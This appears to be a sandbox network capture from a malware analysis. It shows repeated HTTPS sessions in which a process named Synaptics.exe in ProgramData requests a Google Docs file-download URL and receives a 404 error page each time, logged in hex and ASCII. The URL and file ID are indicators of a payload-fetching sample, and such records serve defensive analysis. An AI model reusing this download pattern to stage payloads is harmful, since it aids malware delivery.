                                                                                                                                                                                        2022-05-17 11:31:34 UTC117INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:34 UTC117INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        39192.168.2.349786142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:34 UTC114OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:34 UTC118INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:34 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-BepeyaCpmyJh7/sZeFoR7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:34 UTC119INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:34 UTC119INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 53 38 76 52 4f 69 67 38 66 33 34 74 77 69 51 70 68 54 63 59 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kS8vROig8f34twiQphTcYg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:34 UTC120INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:34 UTC120INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        4192.168.2.349739142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:29 UTC12OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:29 UTC12INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:29 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-B6zRWkto26J+7xP5gfl04g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:29 UTC14INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:31:29 UTC14INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 31 4f 59 30 77 4f 39 4d 45 35 35 6d 75 56 67 72 62 55 62 61 48 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="1OY0wO9ME55muVgrbUbaHg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:31:29 UTC15INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:31:29 UTC15INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        40192.168.2.349788142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:34 UTC117OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:34 UTC121INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:34 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-P0tZ9R+KXbui8YiWpXTbmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:34 UTC122INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 76 34 4d 68 45 4d 56 2f 56 73 39 2f 35 67 4d 53 4b 32 4b 62 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0v4MhEMV/Vs9/5gMSK2Kbw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:34 UTC124INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:34 UTC124INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        41192.168.2.349789142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:34 UTC120OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:34 UTC124INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:34 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-8NfiRnzK+yv9bBH/nb7cgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:34 UTC125INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 38 6d 57 73 67 30 47 6d 67 38 76 32 69 45 77 79 56 36 37 64 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="R8mWsg0Gmg8v2iEwyV67dg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:34 UTC127INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:31:34 UTC127INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        42192.168.2.349790142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:31:34 UTC124OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:31:34 UTC127INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:31:34 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-5TR+YQYXxdBETEJDvc23SA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:31:34 UTC128INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 72 65 72 55 70 43 67 67 74 64 75 67 6f 47 75 64 58 2f 32 37 66 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rerUpCggtdugoGudX/27fA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:31:34 UTC130INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
